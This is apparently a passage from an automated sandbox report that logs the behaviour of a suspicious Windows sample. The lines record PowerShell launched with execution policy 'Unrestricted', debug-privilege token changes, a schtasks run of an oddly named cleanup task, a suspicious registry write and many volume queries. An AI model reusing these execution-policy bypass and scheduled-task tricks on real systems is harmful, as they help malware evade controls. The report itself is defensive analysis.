(Evaluation) Storage Server Workgroup Storage Server Workgroup (core installation) Web Server Web Server (core installation) Small Business Server Esse
Source: .exe, 0000001F.00000000.2189132953.00007FF68D3CC000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: Datacenter (without Hyper-V)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000271256F2377 rdtsc 8_2_00000271256F2377
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: firefox.exe, 00000003.00000003.1550834675.000001CA1BAC1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hSoftware\Policies\Microsoft\Windows\PersonalizationNoChangingStartMenuBackgroundPersonalColors_BackgroundWilStaging_02RtlDisownModuleHeapAllocationRtlQueryFeatureConfigurationRtlRegisterFeatureConfigurationChangeNotificationRtlSubscribeWnfStateChangeNotificationRtlDllShutdownInProgressntdll.dllNtQueryWnfStateDataLocal\SM0:%d:%d:%hs_p0Local\SessionImmersiveColorPreferenceBEGINTHMthmfile\Sessions\%d\Windows\ThemeSectionMessageWindowendthemewndThemeApiConnectionRequest\ThemeApiPortwinsta0SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\PersonalizeAppsUseLightThemeSystemUsesLightThemedefaultshell\themes\uxtheme\render.cppCompositedWindow::WindowdeletedrcacheMDIClientSoftware\Microsoft\Windows\DWMColorPrevalenceSoftware\Microsoft\Windows\CurrentVersion\ImmersiveShellTabletModeMENUAccentColorSoftware\Microsoft\Windows\CurrentVersion\Explorer\AccentDefaultStartColorControl Panel\DesktopAutoColorizationAccentColorMenuStartColorMenuAutoColorSoftware\Microsoft\Windows\CurrentVersion\Themes\History\ColorsSoftware\Microsoft\Windows\CurrentVersion\Themes\HistoryAccentPaletteTab$Shell_TrayWndLocal\SessionImmersiveColorMutex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.3208.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
